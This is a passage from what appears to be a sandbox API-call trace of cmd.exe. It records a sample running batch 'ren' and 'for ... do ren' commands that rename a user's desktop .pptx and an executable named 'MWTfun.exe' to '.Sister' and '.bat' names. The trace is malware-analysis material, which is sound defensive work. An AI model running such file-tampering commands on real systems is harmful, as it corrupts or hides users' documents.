0x21ed97bfbf0 [0202.885] GetProcessHeap () returned 0x21ed8c70000 [0202.885] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed937a870 [0202.885] ??_V@YAXPEAX@Z () returned 0x1 [0202.885] ??_V@YAXPEAX@Z () returned 0x1 [0202.885] GetProcessHeap () returned 0x21ed8c70000 [0202.885] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9ab6ed0, Size=0x1f8) returned 0x21ed9ab6ed0 [0202.885] GetProcessHeap () returned 0x21ed8c70000 [0202.885] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9ab6ed0) returned 0x1f8 [0202.885] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0202.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.885] GetFileType (hFile=0x50) returned 0x2 [0202.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.885] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0202.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.887] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0202.891] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.891] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.891] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0202.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.891] GetFileType (hFile=0x50) returned 0x2 [0202.891] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.891] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0202.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.891] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0202.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.892] GetFileType (hFile=0x50) returned 0x2 [0202.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.892] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.892] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9ab69b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9ab69b0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.893] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"_zyi016uyI EccZobgM.pptx\" \"_zyi016uyI EccZobgM.pptx.Sister\" ") returned 62 [0202.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.893] GetFileType (hFile=0x50) returned 0x2 [0202.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.893] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.893] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0202.894] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0202.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.894] GetFileType (hFile=0x50) returned 0x2 [0202.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.894] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.896] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.898] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0202.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.898] GetFileType (hFile=0x50) returned 0x2 [0202.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.898] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.899] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0202.899] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0202.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.899] GetFileType (hFile=0x50) returned 0x2 [0202.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.899] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.900] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0202.900] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0202.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.900] GetFileType (hFile=0x50) returned 0x2 [0202.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.900] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.901] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0202.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.905] GetFileType (hFile=0x50) returned 0x2 [0202.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.905] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.906] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9ab6ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9ab6ea0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.906] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.bat\" ") returned 61 [0202.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.906] GetFileType (hFile=0x50) returned 0x2 [0202.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.906] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.908] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3d) returned 1 [0202.914] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0202.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.914] GetFileType (hFile=0x50) returned 0x2 [0202.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.914] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0202.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0202.919] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.920] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.920] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.920] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.920] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.920] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.920] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.920] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.920] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.920] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.920] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.920] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.920] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.920] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.920] ??_V@YAXPEAX@Z () returned 0x1 [0202.920] GetProcessHeap () returned 0x21ed8c70000 [0202.920] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed9a55dc0 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a55dc0, Size=0x8c) returned 0x21ed9a55dc0 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a55dc0) returned 0x8c [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed9a55e60 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed9a75f00 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a75f00, Size=0x8c) returned 0x21ed9a75f00 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a75f00) returned 0x8c [0202.921] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.921] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14f40 [0202.921] GetProcessHeap () returned 0x21ed8c70000 [0202.921] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9573930 [0202.921] _wcsicmp (_String1="_zyi016uyI EccZobgM.pptx", _String2=".") returned 49 [0202.921] _wcsicmp (_String1="_zyi016uyI EccZobgM.pptx", _String2="..") returned 49 [0202.922] GetFileAttributesW (lpFileName="_zyi016uyI EccZobgM.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx")) returned 0x20 [0202.922] GetProcessHeap () returned 0x21ed8c70000 [0202.922] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9ab70e0 [0202.923] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9ab70f0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.923] SetErrorMode (uMode=0x0) returned 0x0 [0202.923] SetErrorMode (uMode=0x1) returned 0x0 [0202.923] GetFullPathNameW (in: lpFileName="_zyi016uyI EccZobgM.pptx", nBufferLength=0x7fe7, lpBuffer=0x21ed979fc40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx", lpFilePart=0xa6cf4fd660*="_zyi016uyI EccZobgM.pptx") returned 0x30 [0202.923] SetErrorMode (uMode=0x0) returned 0x1 [0202.923] GetProcessHeap () returned 0x21ed8c70000 [0202.923] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95769f0 [0202.923] _wcsicmp (_String1="_zyi016uyI EccZobgM.pptx", _String2=".") returned 49 [0202.923] _wcsicmp (_String1="_zyi016uyI EccZobgM.pptx", _String2="..") returned 49 [0202.923] GetFileAttributesW (lpFileName="_zyi016uyI EccZobgM.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx")) returned 0x20 [0202.924] ??_V@YAXPEAX@Z () returned 0x1 [0202.924] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.924] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.924] malloc (_Size=0xffce) returned 0x21ed97afc20 [0202.924] ??_V@YAXPEAX@Z () returned 0x21ed97afc20 [0202.924] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx")) returned 0x20 [0202.924] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0202.924] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0202.924] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed9573940, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9573940) returned 0x21ed9a14340 [0202.924] malloc (_Size=0xffce) returned 0x21ed97cfbe0 [0202.924] ??_V@YAXPEAX@Z () returned 0x21ed97cfbe0 [0202.925] ??_V@YAXPEAX@Z () returned 0x1 [0202.925] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0202.926] FindNextFileW (in: hFindFile=0x21ed9a14340, lpFindFileData=0x21ed9573940 | out: lpFindFileData=0x21ed9573940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0x0, cFileName="_zyi016uyI EccZobgM.pptx", cAlternateFileName="")) returned 0 [0202.927] GetLastError () returned 0x12 [0202.927] FindClose (in: hFindFile=0x21ed9a14340 | out: hFindFile=0x21ed9a14340) returned 1 [0202.927] ??_V@YAXPEAX@Z () returned 0x1 [0202.927] ??_V@YAXPEAX@Z () returned 0x1 [0202.927] ??_V@YAXPEAX@Z () returned 0x1 [0202.927] ??_V@YAXPEAX@Z () returned 0x1 [0202.927] GetProcessHeap () returned 0x21ed8c70000 [0202.927] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14ca0 [0202.927] GetProcessHeap () returned 0x21ed8c70000 [0202.927] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95660, Size=0x16) returned 0x21ed8c95920 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95920) returned 0x16 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed9a75fa0 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a75fa0, Size=0xb2) returned 0x21ed9a75fa0 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a75fa0) returned 0xb2 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579a30 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579a30, Size=0x30) returned 0x21ed9579a30 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579a30) returned 0x30 [0202.928] GetProcessHeap () returned 0x21ed8c70000 [0202.928] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579a70 [0202.928] malloc (_Size=0x1ff9c) returned 0x21ed979fc40 [0202.929] GetProcessHeap () returned 0x21ed8c70000 [0202.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9571940 [0202.929] GetProcessHeap () returned 0x21ed8c70000 [0202.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9571dc0 [0202.929] ??_V@YAXPEAX@Z () returned 0x1 [0202.929] malloc (_Size=0x1ff9c) returned 0x21ed979fc40 [0202.929] GetProcessHeap () returned 0x21ed8c70000 [0202.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9572840 [0202.929] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed979fc40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0202.929] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9a55ec0, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14b20 [0202.929] FindClose (in: hFindFile=0x21ed9a14b20 | out: hFindFile=0x21ed9a14b20) returned 1 [0202.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9a55ec0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a148e0 [0202.929] FindClose (in: hFindFile=0x21ed9a148e0 | out: hFindFile=0x21ed9a148e0) returned 1 [0202.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa38fb371, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa38fb371, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9a55ec0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14640 [0202.930] FindClose (in: hFindFile=0x21ed9a14640 | out: hFindFile=0x21ed9a14640) returned 1 [0202.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa38fb371, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa38fb371, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9a55ec0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0202.930] malloc (_Size=0x1ff9c) returned 0x21ed97bfbf0 [0202.930] ??_V@YAXPEAX@Z () returned 0x21ed97bfbf0 [0202.930] GetProcessHeap () returned 0x21ed8c70000 [0202.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67930 [0202.930] ??_V@YAXPEAX@Z () returned 0x1 [0202.930] ??_V@YAXPEAX@Z () returned 0x1 [0202.930] GetProcessHeap () returned 0x21ed8c70000 [0202.930] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579a70, Size=0x490) returned 0x21ed9579a70 [0202.931] GetProcessHeap () returned 0x21ed8c70000 [0202.931] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579a70) returned 0x490 [0202.931] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x2 [0202.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.931] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0202.938] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.938] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.938] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x2 [0202.938] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.938] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x2 [0202.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.940] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9579a40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9579a40*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0202.941] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x2 [0202.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.941] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteConsoleW (in: 